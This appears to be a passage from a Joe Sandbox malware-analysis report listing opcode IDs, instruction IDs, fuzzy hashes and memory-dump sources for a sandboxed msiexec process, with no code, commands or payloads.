                                                                              • Instruction ID: d6507d92789608f61db1cc5177b5599a868e892263a68cb5fb9dd88446daed3d
                                                                              • Opcode Fuzzy Hash: cf944e3cba6e5706c8e57f1ebdb063eb0610c477cee08558942a130ecc7b9ca9
                                                                              • Instruction Fuzzy Hash: A721FF31704A128FC7159A29C864A2EBBA7FFC9751728846DE956DB394CF30EC02CBC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f08733db08c2b150de02bcf00f83d61a886ccebce358e5b21b97c2c0b0d03cbf
                                                                              • Instruction ID: 011ece297cfe8da3ba6fdef818de84a479461cc0984bc545a7b5b6531cee9dc1
                                                                              • Opcode Fuzzy Hash: f08733db08c2b150de02bcf00f83d61a886ccebce358e5b21b97c2c0b0d03cbf
                                                                              • Instruction Fuzzy Hash: A4215E35B402159FCB19DB68C444AAE7BA5FB99360B60C16DEC099B340DF35EE42CBD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599080230.0000000002D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2d9d000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b380455f45bbcc7200d3df29e64a6bcb56bb02fe75ebede249695037bc4b0c0
                                                                              • Instruction ID: 27f27e30295f412cc549fe20c7259433a49bf02a15330048c6610da02d906921
                                                                              • Opcode Fuzzy Hash: 3b380455f45bbcc7200d3df29e64a6bcb56bb02fe75ebede249695037bc4b0c0
                                                                              • Instruction Fuzzy Hash: 6D21D0B56042049FDF14EF24D980B26BBA2EB88314F34C569E84E4B342C77AD846CA62
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 117d206b22e4bf5e9d0834ce0d9e0cd4bec0560b91ad69531d24f94ad4799105
                                                                              • Instruction ID: 6bcbd8f370b1b81cab9febeb7d019d416a13773d6a986f295edcc55b2755a944
                                                                              • Opcode Fuzzy Hash: 117d206b22e4bf5e9d0834ce0d9e0cd4bec0560b91ad69531d24f94ad4799105
                                                                              • Instruction Fuzzy Hash: 6521D532701149DFDB05AF68E844B6A37A2EB44314F604468E50AEB355DB38ED61CFE0
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2777f41b25c7810169e02ff0c3a9a2794afc67994ca37a97bb5200db8548c7b6
                                                                              • Instruction ID: c4938d64f867e3f8e518020174561f3ced6bec41b19b3e29c0349b75320e1570
                                                                              • Opcode Fuzzy Hash: 2777f41b25c7810169e02ff0c3a9a2794afc67994ca37a97bb5200db8548c7b6
                                                                              • Instruction Fuzzy Hash: 7711CE31300A129FC7195A2AC86492EB7AAFFC97A1328007CE956CB360CF30DC02CBD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fdc4ecfd2374f13a78f3149a4878dc340f72f59446c30d1435628bd519dadc24
                                                                              • Instruction ID: b9963169bed8edf92e09fdfaabb59acb4f42c51cd4b3f5c9349f126cfb6a43f3
                                                                              • Opcode Fuzzy Hash: fdc4ecfd2374f13a78f3149a4878dc340f72f59446c30d1435628bd519dadc24
                                                                              • Instruction Fuzzy Hash: 7121A1B0A003498FEB01DFA5D45078EBBB3FF45304F10C6A9D1949B351EB7869018F81
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 24832a0c21982ef894e5ec146fe033353344998de35cb207c47c10d2e5b77ff2
                                                                              • Instruction ID: ac0245effde159a3f5b0192b8ba41ac66b919f561740f5d449c89ce9fac785da
                                                                              • Opcode Fuzzy Hash: 24832a0c21982ef894e5ec146fe033353344998de35cb207c47c10d2e5b77ff2
                                                                              • Instruction Fuzzy Hash: CD1159B0E00209CFDB40EFA9D44079EBBF2FB44304F10C5AAC1589B311EB786A458F91
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599080230.0000000002D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2d9d000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 12fbbce26f72d6038b7ffe7a8c7a514cff8b31fb1b4a64d3a4d5368661048acf
                                                                              • Instruction ID: bc8f1b27656da8ed900457aafe5f33ff6d508401991d85774005c9be00c6e13e
                                                                              • Opcode Fuzzy Hash: 12fbbce26f72d6038b7ffe7a8c7a514cff8b31fb1b4a64d3a4d5368661048acf
                                                                              • Instruction Fuzzy Hash: DC11BE75504244CFCB11DF14C5C4B15BB62FB44314F34C6A9E8494B756C33AD84ACF62
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b75455e2b46e7ed6e3768e15a3fd0478edbc7d28806b967a7c214fe47c668329
                                                                              • Instruction ID: ddd3840c32b35a8f1a36d94c7be9fbfda094c2a3a884f978e37b67f7239fd941
                                                                              • Opcode Fuzzy Hash: b75455e2b46e7ed6e3768e15a3fd0478edbc7d28806b967a7c214fe47c668329
                                                                              • Instruction Fuzzy Hash: 4621CF74D1060ACFCB00EFA9D948AEEBBF5FF09300F10456AD915B3210EB345A95CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d1b96a07fe53003ca3962894913de43a11eab2d8ec6efe2d2c2e5695c3eb5267
                                                                              • Instruction ID: dae33fa1a3f92310aefc4369a0c58f3d0fa94c7df418ab5e552131f8f50a0683
                                                                              • Opcode Fuzzy Hash: d1b96a07fe53003ca3962894913de43a11eab2d8ec6efe2d2c2e5695c3eb5267
                                                                              • Instruction Fuzzy Hash: 0701D832B001197BCB519E99EC40AAF3BABEBC8750F64801EF905D7344DE759D129B90
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 300438ac895559c92e09f46ef28397f44d0c994502eb38d73d157514cdbb2f1a
                                                                              • Instruction ID: 504381371d92e3250560a5478b6bfe663589aefcea07286ade3a472c91440a71
                                                                              • Opcode Fuzzy Hash: 300438ac895559c92e09f46ef28397f44d0c994502eb38d73d157514cdbb2f1a
                                                                              • Instruction Fuzzy Hash: 63010C74E0030ADFDB40DFA8D945AAEFBB1FB48311F508465E910A3350D7386A55DF91
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 995e4012ec4f5f869af43ad787800a8aca77f5d31e3711f1d566f68226c6664e
                                                                              • Instruction ID: c66ddc21a6d7e66a8e735649d59921dd5ee6533ecf4c90ac083c2d56b7cfd795
                                                                              • Opcode Fuzzy Hash: 995e4012ec4f5f869af43ad787800a8aca77f5d31e3711f1d566f68226c6664e
                                                                              • Instruction Fuzzy Hash: 7EE0C97A740108AFCB108E84DC45FDDBBB2FB8C711F244156FA11A72A0C631E821CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 91a5398a9bb6b3803a06b0221688f7a35a6c0b4eac7914df73cbd08f76eaa811
                                                                              • Instruction ID: 1eab4fcf5309034a380748d5da8f445fd2b456b246c53f26f0d0537e18a5ec7e
                                                                              • Opcode Fuzzy Hash: 91a5398a9bb6b3803a06b0221688f7a35a6c0b4eac7914df73cbd08f76eaa811
                                                                              • Instruction Fuzzy Hash: 8AE0DF32D202299ACF02EBA4DC006DEBF39FF96310F804962D42033400EB302628C3E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fc22964d563a4f6603f3c7e1850493f762574a4ddca896e4f5aafcf1c6c4038
                                                                              • Instruction ID: 7575c555999c5751dd42c298764ec0471084e92922679b7c8193e70e1e0ea7b7
                                                                              • Opcode Fuzzy Hash: 5fc22964d563a4f6603f3c7e1850493f762574a4ddca896e4f5aafcf1c6c4038
                                                                              • Instruction Fuzzy Hash: B8D01231D6022A978B01AAA5DC044DEBB39FE95721B914666D51437140EB70265986E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dc421cf148f40007a496e1f642b1025c59853eab17a6739cf09791bc0f0e0025
                                                                              • Instruction ID: 8cc529019ef5b041c84b10489e01bd8d581bbea4cbd2be5c5213a93b47c9655e
                                                                              • Opcode Fuzzy Hash: dc421cf148f40007a496e1f642b1025c59853eab17a6739cf09791bc0f0e0025
                                                                              • Instruction Fuzzy Hash: 82D05E315247054BD741E731DC06B54373BBB91A40F94C155E24619A2AEFBC2C838FE2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d913b40fc7f0a63b47bf8cb1b8964d46c4dcbe1939a8bffa34ea644b7261c86
                                                                              • Instruction ID: 08ee023f636bded9152db9875124343409aa4658f02649cda2814e41a647260f
                                                                              • Opcode Fuzzy Hash: 2d913b40fc7f0a63b47bf8cb1b8964d46c4dcbe1939a8bffa34ea644b7261c86
                                                                              • Instruction Fuzzy Hash: F7D0673AB100489FCB149F98EC40DDDF776FB98221B048116EA15A3260C6319D26DB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e6a185646275c02c0701c4f6604a06a8f338e14ef948230c4c57f0f89894bc94
                                                                              • Instruction ID: 3d89d5dc94d32e2f36d9e2832f0ba9dfadaa88adabdf873517e9117610ef7ade
                                                                              • Opcode Fuzzy Hash: e6a185646275c02c0701c4f6604a06a8f338e14ef948230c4c57f0f89894bc94
                                                                              • Instruction Fuzzy Hash: 9DC012301143084BD641F761DC55A15335FA690900B90C550924A1965ADEB82C874FE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fca8a7f0dc97019c4d3123fb47065f6c31d16579e3db7f81cf24e2c6a7636ed4
                                                                              • Instruction ID: f24af37bbbf2a491013ead2e070e16046ba9d00f705cfd4cdcd8b8d3bdfcfa8f
                                                                              • Opcode Fuzzy Hash: fca8a7f0dc97019c4d3123fb47065f6c31d16579e3db7f81cf24e2c6a7636ed4
                                                                              • Instruction Fuzzy Hash: 86C1A074E01218CFDB54DFA9C994B9DBBB2BF89304F2081AAD409AB354DB359E81CF51
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6192a31d10cea6ed57c3c1a1f8003b57b7df9947c9e0e5c9afc42ec9d8e83866
                                                                              • Instruction ID: 7d6073f62fab58cba2f59dae53ad3fd61911d4257af1d0efa3c7cdd4c6005b51
                                                                              • Opcode Fuzzy Hash: 6192a31d10cea6ed57c3c1a1f8003b57b7df9947c9e0e5c9afc42ec9d8e83866
                                                                              • Instruction Fuzzy Hash: 0851E1B0D052099FDB04DFA9D5447DDBBB6BB89304F24C12AD4046B794DB799C81CFA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3214e47782cc370abca03acad0823fd492e009affabeb34d8395621e790bb66f
                                                                              • Instruction ID: be7d60e71e3aaed08705380baa239bfec9e246417fd5899e0b60ccc0c5789636
                                                                              • Opcode Fuzzy Hash: 3214e47782cc370abca03acad0823fd492e009affabeb34d8395621e790bb66f
                                                                              • Instruction Fuzzy Hash: A451FF70A0520ACFDB14DFA8D4847EDBBB6FB89300F20815AD145AB794C7399C81CF64
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 414178284693d0fad4d2594eebe592bab68c15cd4ba3d8e7935ae191122781a9
                                                                              • Instruction ID: f4858bd030d246fdc058130fc6e0f9ba8ac9f762940d1b3122e821bbff5432ea
                                                                              • Opcode Fuzzy Hash: 414178284693d0fad4d2594eebe592bab68c15cd4ba3d8e7935ae191122781a9
                                                                              • Instruction Fuzzy Hash: 4351ED70E0520ACFDB14DFA8D484BEDBBB2BB89304F20912AD145AB794C7399C81CF64